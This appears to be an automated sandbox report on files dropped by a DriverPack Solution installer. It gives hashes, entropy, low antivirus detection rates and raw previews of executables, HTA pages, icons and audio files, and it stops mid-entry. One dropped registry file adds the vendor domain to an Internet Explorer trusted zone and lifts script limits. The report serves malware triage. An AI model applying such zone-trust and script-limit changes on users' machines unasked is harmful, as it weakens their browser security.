      Preview: [if !(IE 6)]> >.<!DOCTYPE html>. <![endif]-->.<html style="">..<head>. <title>DriverPack Solution</title>.. { IE10 } -->. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta http-equiv="MSThemeCompatible" content="yes" />.. { FAVICON } -->. <link rel="shortcut icon" href="Tools\Icon.ico" type="image/x-icon" />.. { NO CACHE IE }-->. <meta http-equiv="cache-control" content="no-cache" />. <meta http-equiv="expires" content="0" />. <meta http-equiv="pragma" content="no-cache" />... { STYLES } -->. <link rel="stylesheet" type="text/css" href="css/normalize.min.css" />. <link rel="stylesheet" type="text/css" href="css/open-sans.css" />. <link rel="stylesheet" type="text/css" href="css/roboto.css" />. <link rel="stylesheet" type="text/css" href="css/proximanova.css" />. <link rel="stylesheet" type="text/css" href="css/icons-checkbox.css" />. <link rel="stylesheet"
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
      Category:dropped
      Size (bytes):99678
      Entropy (8bit):4.106738120089836
      Encrypted:false
      SSDEEP:
      MD5:CBD76182149BBA7EB76EC535DA43DB7F
      SHA1:A4D89F2D3EEBE61143B429775E3654E74A600CE6
      SHA-256:8707AE608F38AFD9ADE700BBDCA79344A4F50EAFC9EA3592B1E9FD6B616A6314
      SHA-512:90EF42B0762717A3F4AA86B5798B80F55A19511512F09D983912C110DC43AB1DF14773CF4C340AE77DAE180C188C7162BDF6E37DBC100DB744830433817F579E
      Malicious:false
      Reputation:low
      Preview:............ .h...V... .... .........00.... ..%..f...@@.... .(B...;........ .(...6}..(....... ..... ......................................w...t...y...{.J.~.k...m...M.............................r...x...w...y.u.{..}...............l.....................n...x...x.#.y...{...~.............................G...1.........y...y...z...{...~................................~...... .....{...{.o.|..................................."...e.................}.P................................... ...d..........*.....{.....U.....................................y...........d...2...>.......0...................................................l.....s...........U...................p......................N...............D...........L..........&...M...............j........................E.............z.....a...........0.................................O...................*..."....................................P...................K...................2................d..........
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
      Category:dropped
      Size (bytes):5949966
      Entropy (8bit):6.443448262854648
      Encrypted:false
      SSDEEP:
      MD5:B95DBDE252CC8EA490E1D9D04EC5FE0D
      SHA1:EDD746C496EA8564367B3108736490DCFC14C360
      SHA-256:0AE98794B3523634B0AF362D6F8C04A9BBD32AEDA959B72CA0E7FC24E84D2A66
      SHA-512:D2DF384B979F01FBF77067B2D68879221684FFCBFC270000A50BE972C8C6BC8F3CC3C1F03EA79216B7B0B296EA27581D38B311472281571BC20D47E61D7CCA47
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      • Antivirus: Virustotal, Detection: 2%, Browse
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........Z............#.tD...Z..0............D...@..........................P[......W[...@... ...............................X.."...........................@Y.............................<.I.......................X..............................text...HsD......tD.................`.p`.data....>....D..@...xD.............@.`..rdata........D.......D.............@.p@/4.......$....K..&...lK.............@.0@.bss..........X.......................`..idata..."....X..$....X.............@.0..CRT....4.... Y.......X.............@.0..tls.........0Y.......X.............@.0..reloc.......@Y.......X.............@.0B........................................................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):70144
      Entropy (8bit):5.100109801224976
      Encrypted:false
      SSDEEP:
      MD5:20F619EBB6D10EE6A5C164D7DFD36F32
      SHA1:05CCB1B2A9D14EFB1A618826F9E94621538B1871
      SHA-256:99B69330B3FC2A1DD0C68361BB03B6F04FA5AF40A6708E03E90F31A947145EF0
      SHA-512:2ACFC0C2E6956F879263279B01D4D74CF241EFC8BE22E1A33A502E48EA35405E2BFDACDB6428A970B02960B070A5FE816791C2326E7A27A687C57BCCE9712AA9
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      • Antivirus: Virustotal, Detection: 0%, Browse
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`aE.$.+.$.+.$.+.$.*.K.+.R.P./.+.R.V.&.+.R.F.(.+.R.E.'.+...u.%.+.R.S.%.+.Rich$.+.........PE..d...k^CB..........#......~...........s.......................................@......:D............... ......................................h...x.......H............................................................................................................text....}.......~.................. ..`.data...............................@....pdata..............................@..@.rsrc...H...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):791040
      Entropy (8bit):6.645854598879805
      Encrypted:false
      SSDEEP:
      MD5:B93EB0A48C91A53BDA6A1A074A4B431E
      SHA1:AC693A14C697B1A8EE80318E260E817B8EE2AA86
      SHA-256:AB15A9B27EE2D69A8BC8C8D1F5F40F28CD568F5CBB28D36ED938110203F8D142
      SHA-512:732CB0DCB2B1DAC1A7462554C256CEC27DE243734F79B7F87026E9F5FBAE6D5D8A5F14A702D2AF0B65897B6ABAD70A9EFF1905DC851CE267D221DDCDD9E640C5
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      • Antivirus: Virustotal, Detection: 0%, Browse
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.o..c<..c<..c<..o<..c<..h<..c<-.m<..c<..i<..c<..g<..c< .<<..c<..b<0.c<-.><..c<.,h<..c<.,i<..c<...<..c<6x`=..c<i.e<..c<Rich..c<................PE..L...`E.a.................0...J...............@....@.......................................@.....................................x....0.......................@...c...................................................@..H............................text...u/.......0.................. ..`.rdata...Y...@...Z...4..............@..@.data...$s..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...q...@...r..................@..B................................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
      Category:dropped
      Size (bytes):401408
      Entropy (8bit):7.923045208808536
      Encrypted:false
      SSDEEP:
      MD5:BD126A7B59D5D1F97BA89A3E71425731
      SHA1:457B1CD985ED07BAFFD8C66FF40E9C1B6DA93753
      SHA-256:A48AD33695A44DE887BBA8F2F3174FD8FB01A46A19E3EC9078B0118647CCF599
      SHA-512:3EF1B83EA9821CB10F8BC149EC481D1E486D246A0CB51FE7983785529DF42C6FE775E0D35C64A97F997CDF294464C7640DF392239B96CE1BE6143CE8F07B5A8A
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............w.w.w...w...w.x.w.G.7.w.G.k..w.*.w.>.*.w.v...w.(.u.w.-.w.Rich..w.................PE..L......I................. ........................@.............................................................................4...................................................................................................................UPX0....................................UPX1..... ..........................@...UPX2................................@...............................................................................................................................................................................................................................$Info: This file is packed with the UPX executable packer http://upx.tsx.org $..$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $..UPX!....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 50 x 50
      Category:dropped
      Size (bytes):32493
      Entropy (8bit):7.248603663302706
      Encrypted:false
      SSDEEP:
      MD5:8A061EF740FA2801AB4BF78CB123D9BE
      SHA1:72F997C5EE3E15F9A847BDA9EFCB935F13620A19
      SHA-256:EE0CC89EF293B559B64FCB35B469DCB144180FF048B0B6EB14F326847A544903
      SHA-512:FADAC9C2090C6C77C4F8EFEF87875E108127DFCEAE804DD498956BBB77F98A54BB925888199458CD2BCDB650C7607A34737D54B94B34AE256A625B66C4B411AC
      Malicious:false
      Reputation:low
      Preview:GIF89a2.2..........LJL......$"$......dfd......TVT......,.,......LNL............|z|...424.....................!..NETSCAPE2.0.....!.......,....2.2..._`&.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..0.!.4......,.....8('....l...K.z..K......6!.!.......,....2.2...........DFD...,*,...dfd..................TRT............424...trt......TVT......................\`&.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z...I.8...d.(#.KCy.X&...R.......`.....[......&!.!.......,....2.2........DBD.........dbd...,*,......424...DFD....ljl...,.,........................................^ %.di.h..l.p,.tm.x..|....pH,...r.l:.....h:.....4d......r..2 .....e$ A...C.................K!.!.......,....2.2...........LJL...$&$............ljl...464..................|z|.........dbd...,.,............<><...|~|.................................................................................................pH,...r.l:..tJ.Z..v..z..xL..../.4.X.C..@O.........t..p... }..z..}!.......................\..........}....}...}...}....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:HTML document, Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):27824
      Entropy (8bit):5.514782182624823
      Encrypted:false
      SSDEEP:
      MD5:69013B5F2C85EF14D5AF5B0598796A16
      SHA1:AD8042D438A6A483E1716BF97C7B945CBEA0EA37
      SHA-256:A9B7A43232D0B48DC2F75269DCA5898F4149B81634C461C279A81AC725879E2E
      SHA-512:BBAB6470F89D5C8475B8B58C82BDC9D0435EA645EF0EB8C481CBE9D65867918B6D7E9D35B20A1790333617935E036136C8B80124E11C439B2E01AE9B999A9EFC
      Malicious:false
      Reputation:low
      Preview: [if !(IE 6)]> >.<!DOCTYPE html>. <![endif]-->.<html>.<head>. <title>DriverPack Solution Bugreport</title>.. <meta name="viewport" content="width=device-width, initial-scale=1">... { IE10 } -->. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta http-equiv="MSThemeCompatible" content="yes" />.. { NO CACHE IE }-->. <meta http-equiv="cache-control" content="no-cache" />. <meta http-equiv="expires" content="0" />. <meta http-equiv="pragma" content="no-cache" />.. { STYLES } -->..<style type="text/css">...@font-face {... font-family: 'Proxima Nova Regular';... src: url('../../css/fonts/ProximaNova/proxima_nova_regular-webfont.eot');... src: url('../../css/fonts/ProximaNova/proxima_nova_regular-webfont.eot?#iefix') format('embedded-opentype'),... url('../../css/fonts/ProximaNova/proxima_nova_regular-webfont.woff') format('woff'),... url('../../css/fonts/Proxim
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Windows Registry text (Win2K or above)
      Category:dropped
      Size (bytes):1038
      Entropy (8bit):4.427030072283101
      Encrypted:false
      SSDEEP:
      MD5:D49DB2EC30494B46D332D516CEAD4969
      SHA1:3D9CE116AFE59760C9A1C149DDEC92A2F92A0028
      SHA-256:C86EF9ED6E111D166818E8E0ADB3CF5E2A3A5DFC6EDC932ABC298141ED6F2208
      SHA-512:1314C6BC4095E445C930C0A0A94A83FF39670081ED916337EED2F74E3453702AE0E0187C0E6C933D52868D80C36E9ACBE558FAF86F10146D0A825B97C3BC261D
      Malicious:false
      Reputation:low
      Preview:Windows Registry Editor Version 5.00....; --------------------------------------------------..; - ZoneMap patching -..; --------------------------------------------------....; production....[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\drp.su\update].."http"=dword:00000001.."https"=dword:00000001......; --------------------------------------------------..; - Disables offline mode -..; --------------------------------------------------....[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings].."GlobalUserOffline"=dword:00000000....; --------------------------------------------------..; - Fix for long running scripts -..; --------------------------------------------------....[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles].."MaxScriptStatements"=dword:ffffffff....[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Styles]..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:HTML document, ASCII text
      Category:modified
      Size (bytes):2666
      Entropy (8bit):5.162422470112314
      Encrypted:false
      SSDEEP:
      MD5:66E315709C21E476C5511BD8325DF9F7
      SHA1:1A39BB143670F45147B5746F1AE2836C7520BAB0
      SHA-256:5B5582C940D24BD040CABD1D0D1C21249899546E0D3278692200ED65C3201EBF
      SHA-512:C868C33BB55E56AC13A4C8C7C7ABF64FFCB717A134367E8C0977D987C0E8A1F03F4F9EC7DF04550E2027B9BDFB170034182645EA8589866853F1CA249168467F
      Malicious:false
      Reputation:low
      Preview: [if gt IE 6]>.<!DOCTYPE html>.<![endif]-->.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" style="background-color: #004777;">.<head>. <title>DriverPack Solution</title>. <meta HTTP-EQUIV="MSThemeCompatible" content="yes">. <meta http-equiv="X-UA-Compatible" content="IE=9">.. { IF [NOSCRIPT] } -->. <noscript>. <meta http-equiv="refresh" content="10;URL='http://drp.su/error/noscript/'">. </noscript>.. <style>. html, body {. width: 100%;. height: 100%;. margin: 0;. padding: 0;. }. .hta-loading-screen {. position: fixed;. width: 100%;. height: 100%;. top: 0;. left: 0;. z-index: 9999;. background: #006a7b;. background: linear-gradient(to right, #006a7b 0%,#00b4a8 100%);. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#006a7b', endColorstr='#00b4a8',GradientType=1 );. }. .hta-loading-screen_logo {. position: absolute;. top: 50%;. left: 50%;
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      File Type:MPEG ADTS, layer III, v2, 32 kbps, 24 kHz, Monaural
      Category:dropped
      Size (bytes):21120
      Entropy (8bit):7.78927513894431
      Encrypted:false
      SSDEEP:
      MD5:95C290A75E2D3D44F0D76142508EDCF6
      SHA1:A090827BD93CBE812E32D81272F7CFE9A9B31B4A
      SHA-256:7CE172BA3DF0C381DABC6688DC584035860052B57242EC01EE3ADC60CCB3BBC3
      SHA-512:F2BC1232896EEFD0B7E27158067BFFAA4BACD602A2FD948896EE6123DBB0AD504084F3CED7A9EFA3E7C444A1301126F95AE6466FA7004D9C30661DC62B5C9BD3
      Malicious:false
      Reputation:low
      Preview:..D...A.T.L....8.K..... ..+...).<...B..2..!.....>Q..?.....>..|.Pc........G.....D..+..D..LP!...D...3.|..h..n7........A.Q...7..pq... ."f>......n..=?..I../.n......:.PM7C.......7.e..HQ...\A.#..D...i....H.... .:..[!...T.....E....rU..u.^Y.....;.$.....?.`I....4....S'7.Zl.^.F.A..zs...|.,..D...Ab..3..... ..a.J.^e.#..F...v....yI.pc..( ..g.5....P. ..C.........,..+.....w.O.~.f....D....B..~.p.4.....EUr.....2R;b@.....G...6j.,...m...Z. .4.....@.p....$....#.uO..............D....Z...R..*..Jg..7!.....r./j.N.D..[W...@..s.!S?...?..u7%|.....d......u..X...}lS.P.....D....f...J.......Z...;.A..a..c..._.^u...r..V.....m...]....L..AqZe.......sq..Z.U.....W....2].8..D....Z........{..c+*%.L..{..3.dY.X.:...(.6(..e.........:R............1....n&d.w..3'0 ... ..D...qJ..k...........#;.5K...mQ..."9..Q.cw...../...b..Y...}C...?-#..JN].P?..9.7..GD.(rE.'......D.#..B....p.0R(..,..h.DJ.D..q,...+.k...I.y...#....>.j..gL8.mi.8.c-)..\.**r).W(..uo5.6..}z...D.+..>....p+hv"r..0.Z...'.IYcB...1..t
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      File Type:MPEG ADTS, layer III, v2, 32 kbps, 24 kHz, Monaural
      Category:dropped
      Size (bytes):39265
      Entropy (8bit):7.608211659654475
      Encrypted:false
      SSDEEP:
      MD5:00D14954338CFC5A011E75AFE7237355
      SHA1:5534FCAAFD1E9EDAE19A514C415B48A929842FCF
      SHA-256:3A2F113B271E4A4A6BC8BE28F4396BABF7E92331492074C29DBAA83D0C09AD57
      SHA-512:0C1AF04BBF833018D2E39A2D888EF16C9686EB0BF1561030B06E9B257678A5E02328D42D5CC66FA3EBFE8CE8705568012653A0CD236C466AB84AD42A2EDE50C7
      Malicious:false
      Reputation:low
      Preview:..D....]X.L..0r.1,K...... H<..{...a.P>.@1.....A........>.....a....8'~@.>\.`... s.....^.)...2...D...q...h...C770%.".+..x..$!..#...3O.y...}...04.i<........>..........4...d.....1.a.F..D...Q....`.U....$!..O-.H.[f.....`..va..AD&...t.Gc.&....]s....:.39Zd..2....6........ ..J.p-..D....b...X.@..).'F"Ke..p.E.^...)..l3&..R...BcS..*.F....{......"...H.*.m..../.a..'..R.2)}f*..D...Q....X.'.F?.t..:..Y.....m.>11.=...%.qb..R%.Aj.~..v....vw.z..].#p._....z.....7*.?j.....D...........jPPm.$.*.@....U.....R<h..c..j .!...$-..;G...K...l.....*~W..oZ.....uJ......<.......D...Q:...Rp..-0.Dn}..;.8n.........Q..#DB<`....S.k.q8$.C*0.=.@.TU. *.....<.."..*..........:.k..D....6....p.;...hH."..^........0\.<..........z..)$@.A.Q...9.Z*...P....#.{.T.g.........E....D...!.....Kt....^...o]Z....5..t.P...R.Z{...0...4.K.W%....X..7.Z..z..$$..$.............!s.....D.........p..~.........`..Y.........D=Q....}....@o.,.*....2e.h....;..kx.=k.2...p..<:9..I..D.....t.H............+!..J_.R.......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):39437
      Entropy (8bit):7.597807385758334
      Encrypted:false
      SSDEEP:
      MD5:B894A8022829BEEF86DC0C8A969BD879
      SHA1:7AEAA318B68FB773D5C0708BE1E5D5CEFCE2AA97
      SHA-256:957A16CC0BB8754363DB2B982D048DE3D587A819BBAAD35987BE307C3EA1F48E
      SHA-512:03055129A449597C7649FE83410B243A6C0ABECB995DB8D651D7A76889CE615FB91DD357AF0CD12D2CA069AE060B26669C27DFFBC2A1A2DD654E4436C3BE97DD
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info.......,................ #%(*-0257:<?ADFILNQSVX[]`behjmortwy|~......................................................Lavc58.11............$.7........-..................... d......."..... ....t.....@..4..........`@..&.\............\..........'q;4{...}..Vd........b4..U...|.....&..C..............."d......0...... ....h9...g...4........9Qk....R..C..g.<}.}7mN.....W.G...k.........&.h....J.....M...zi ..@.4Yk.?.pA....QC..V..."d)....E....... ...... E.@...4......x....$...y.TA2....s.n....U...0..6.gZh..&\...... ..o...E`..(Z.}Hw..I............{..?R`..E*.... d<...G.f.0... ...... E.....4.....)!..U.\I..o..K.....%..X.....Wo......a.K....@.B.....[..N.*Z..0%.Vx.S..)..yVWVr...[.?m.{.;..."dP......!..... .....5.&.H@..4.....`.T..."&....c..?..........(Vj.Q.7.J....jh..;]i.:mx..k8..o9....C.X...?......G?....S9....B.b..."db....H....... .....Q"..LP..4.....{.....#.[..$...qV..W....,@...!.......C....;a<.:..L....._
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):34212
      Entropy (8bit):7.585036978714825
      Encrypted:false
      SSDEEP:
      MD5:31ECE55FDDC2A8321AA5C3F9DB6C988A
      SHA1:8C04C1A96C19C87FE84E8DA768F08DAD73F7AFAA
      SHA-256:E45CB0E8E3EA147CA3503A369442AAA1B7E8B7A699E9C175089F8208D8CB6649
      SHA-512:A6A65F5FF6C32F395D063972B301E26903936EE84E603A28D46A0E1DB9CB3E1ECA9BEC101A39C319F5C533CC460D772EBF023AD2A78720316B5B1640AD7B7419
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info...........w............ "%(*-/257:<?BDGIKNPSUX[]`behjmoruvy{~......................................................Lavc58.11............$.........w.#.P.................. d............ .............4....Dx!..."....4..&BO...($...(.....^'e.8..VV.`.'..#k.P...._....jAf.Rp.D(...X .4..q.8..&..WF.;P.."d....$....0... ....D...0.@..4....o.?.|fb.0m[..|._...ZokwQ[.c!....0..^..z.(3.u... !s....j ......dm.k;?..O......e... R.....]..."d........0.... .........b@..4.......a..)......I'.......J....Zt...7...])...q:,...j_..g.I.......f...cH8......4+.4....*.o4s.zh... dF....I....... .... .+..@ ..4....A...B..B. /8Q2.....DB...T.%.D.i.....o..F^{..6..>.>.......&.yQ.. ...4.Q.._...v.b.P....<......"d[......0.... ......)..@`..4.........3E.M.6.f.....E...$I.,$Y9.j%U.d.U..-....d(q..1.P`>B..l.8.@.&B]......E..j..f.(.hFO+...M.."du.. .I..... ......:.....4.........DX"qR...o.8-...$...pL........].sD..re..o0.e.m..u9*
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):24024
      Entropy (8bit):7.566865520855741
      Encrypted:false
      SSDEEP:
      MD5:4FC18A9B71EBC68921ED074E31D9270E
      SHA1:9049FFDFA86BAC0A8AB9DD28A7A647C3A8C72AEB
      SHA-256:772899FCBDD6CE22770DFE71E1C3351F61C8CCDB1D143D54CD603B2CCF751B1B
      SHA-512:BBA5E1D247D4DBD2953ABB03CCF42DB386797F967CE3EFEA4C33A4E70A3AD0D90F52B1E4E2F055D1D59396708E46C6B2D8520C8396FBED48F64378D6329CDE36
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........]............. #&),-0358;<?BEGILNQTWX[^acehjmpstwz|.......................................................Lavc58.11............$........]...E................... d.......&..... .........@..4.........B(...........C>rB....@\.4...1....A......h...A.x.D..v..].0..@.,.....U.Ct.$T...E...p.K..r.."d............. ....t.$.b...4....>.i..q.(.*I`.E......i..../s.B. ..lR...,.(....o[i/..bhKP.*.|...B...`L&...P!.t..A@........s......"d).....l0.... .....5...n...4.....h..J.?......\0"..lv..;QJ...`....H....^ w.q......B.....-..].kj5u...^.A..2=....p.BA .W...t.].. d>.....i..... ....@W"&.g...4....o#...q....7.F......0.$2..(.d{.).,..mQ.......,...h$.w..~...O.......@...L.'7....m,..gK..$..7~...."dR........... ....HQ$$.L`..4...... ."...P..8..X.q.V.M"@.8..b..4.....A..k=nI(.dB.:].....JF......9.....^#...w....\....a.:.6.^.."de........h... ......)$.` ..4....H.7%w...............9...(.oZ.F..W.Z..{.... .L!..n..\...2.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):17886
      Entropy (8bit):7.54661954496351
      Encrypted:false
      SSDEEP:
      MD5:9AAB5F195CD31E373FADF4D6805695F2
      SHA1:6546DA7A8C225A8845F978E6155AF5C511E66494
      SHA-256:CC0046FDD1961C7591898D075198429A986B5D61B825AAF07A77B932F5414866
      SHA-512:9E142F48C17B49944593814443ADDCBD8268DCC2D88FA6F999569B41D437A8EC67623765A2EFF792ABD0D2EE8FF7338755AE09987A6F9D3896A20E21CA6983B9
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........E............."$&*,.1379;>@BFHJMOQUWY\^`dfjkmqsuyz|.......................................................Lavc58.11............$........E....................... d....@.B..... ......1 .@0..4.........q.D.D@OI.}..Hr...E#/}...zMj...:.....So..m..M."+Z..\..M...#G.o..Z..Z&..Y..#.^...@.&==...."d.....D..0.... ....l........4.....'.L...gR...#.b9.l....L...-u...........<.z...Eo.....LT.....1.......J..m.&..<.....U,^..u......"d*....E...@... .........`@..4......J3.x.p.8..1.........D.....E SR..0..F....g.....#...`.5....e...H.59.]^..=...a&D..A...p.P6.1u.. dD....G.i..... ....../..b ..4.....I..]...w....Y#..d.."..[r5#S..7.m.2.k... .....M...B.O.p...~b..&.{<.i.O.}.3.!.;..p.#...._?...."d]....F....... .........`@..4....q.5.q.p...V,.X..$.C.....').J=.x,#....GJ.........d.W...(..8.Z4..B...(.1......a.....z...o......."dv....K."..... ....l..'.`...4.....+q....:..7...O..Ih..`.C.[jJ.B.g.....'..Q......&i..E.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):56155
      Entropy (8bit):7.611465483740866
      Encrypted:false
      SSDEEP:
      MD5:E6F82457DF1D0918E9EC2D62588DD012
      SHA1:347E33D4FC869979F109D807860BCAA5732C278F
      SHA-256:B0BF4F6D33CAB5B44C117258A85A2D490BAFB8E9E07BF8C3EAEB1E5B5E9B29AE
      SHA-512:825FBF1FA31F100FB13D385200D9B353110545FE7DD3A78B6D320D6E28F6DD4A5C3FD97F2EA5B2802E995B51BF636E493D8E3A0DD7F650467A6ADEE0FD427849
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info........................."$(*-/146:<>ACFHLNPSUWZ]`begilortvy{~......................................................Lavc58.11............$...........O.................... d....A....... ........$.@..4......8.....N(.F .....z...P&9....H$...H.....:...S......+"@.$a.`j........U....GdB.E.....d......"d......hB..... .....!...B...4.......^.%...#...NI..e...z/..?qm.a"....Y.Xh...^......m....`.$."..}....vh....|..s.!.o......F....."d-.....0.... ......+..` ..4....bk..d....RR...w[7+....8C..X.1.|.!@v.LX....e2.....h.@..(.C1....k..C(..nS..`.....(..c,.@SPaJ.. dG...J.B..... ....\........4......n;H]r.#.k;..O.....z@.....4\./.Xrw=Y.......UA6b.;..~.o..vP;.............YL+u...@..!...^...h..."da.......H.... ......"...@..4.....BUx.E.G8........f...e....J..`:......q0.... ...#-=}./.ys..:..$..;.....N.D`_.]..DN....t8...J.?.."du......"2.... ....8I4.."...4........!..u~..Uz..W.x..k..#...F...w`...%...ds.Qs.x*..$.-S
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):19061
      Entropy (8bit):7.547734585565087
      Encrypted:false
      SSDEEP:
      MD5:723F7ABC3A9EB779332D97D047680E35
      SHA1:3FA4F08C7411B6AF139EC70675FF1E8587EFE7D6
      SHA-256:05BB6CE8A7C911A9C7FBA5D4A386E3387BFDAF5525CCE9ABA05D29C8C4102BC9
      SHA-512:D5488B7ADF6A2EE79B7C76552BA23B1AB5DC21B370EF10FC5A5450885390846278D493EA8026A83797D4AED7D04C7B58D5854A852AE80DBB824F6AFB745A59D6
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........JH............"$')-.0459;>@CEGJLPQUWX\^acghlnosuxz}.......................................................Lavc58.11............$........JH...................... d.....A.).0... ....H...0....4....$......' $....G..7Nq..;........X..4 .....BN.... k.......`...,..k......Ut..[ir.J...v.,8$H..U.."d......)..... ....X.%..@ ..4.......).?g..u(."d.~P....CR.K.f...v......p.T..3......i.......W.....R...@.1w.....O..Ku....1..C@;...."d*...K`f..... ....4....@...4....l....>/.U...rV.@..q.2...X.E.........!..#AAX..f77.t...%.......,y.j.....+....4Da`.'........B.. dA...F.)..... ....4.-.. ..4.....^-.q..KJZ..q...........&.......2.$W...x8.9...L.3.....3.....Z<..I....l..y..]G.&f...j..I$.eV..."dY......&..... ......",.k...4........B..;-v....Y.._eq-...~.!...=A.1.G..`2c..4-e...`.I.B..#........=...D...s...FR!...xD...bF.."dl../...x..... .....G6.e....4.........-....T.....".;[.}22......e.p%...&!........."..../.n
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):26767
      Entropy (8bit):7.581553419589513
      Encrypted:false
      SSDEEP:
      MD5:E4360CB22B1B602A1BECF017C4D6B220
      SHA1:A5AF8E5BE030A7ACE0885BFAF409E5CC2CCD4DC3
      SHA-256:9C1C807DC3D200B1639E4DCECDE44B3C181F4A18ABA6797924FF34D209F62FDF
      SHA-512:AAFA5AD4E9224F7F811787B478F11BCA69621A3E30D189B4ED73488E09189C27F61379FB6F7085883ABE8B4F6AF73EAF02F8C6F39FEE9B69E344F881DB32AF3B
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........hb............!#&(+-0257:<?ADFIKNPSUY\^acfhkmpruwz|.......................................................Lavc58.11............$........hb..................... d.....?..0.... .........`@..4.....,..(!.8..2.d...C.p.Mo.bu80.(A....i....Bp?^..N..U.#....t.M......1nF].z|...r.....ZI.+2.m4N.__..."d....E.&0.... ..........@..4.....M....H.bhx....s..df.>.l..6.....j.<..]..2...o~.O........h(zZp7u....J..q....~.E.6~..G.e?.U.j..."d.......0.... .........`...4....'q....>...~..LN:._....%..1.Gy&.`..O.....JU. (..RAS......../..(4D.....u.".0..VM....Je...... dF......b..... ....4....`...4.....g.DZ.<./9..F,.|..<\..P...yJ%...'...X*U4.'.?C.....$..R....X...N,.25`....6*..)$ZA..5.3.."d`....F....... ....|.''.. ..4....d.\J7.....$x....U..x...A/..Z+...]}.8&"*..d..3^.....q...[.....>:1....#.?...1..6 ..M.C_...W^.<.."du......00... .....I4.e"@..4....'yB..n......&x.......=.[...I.O...6.h.(D^s..._....A...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
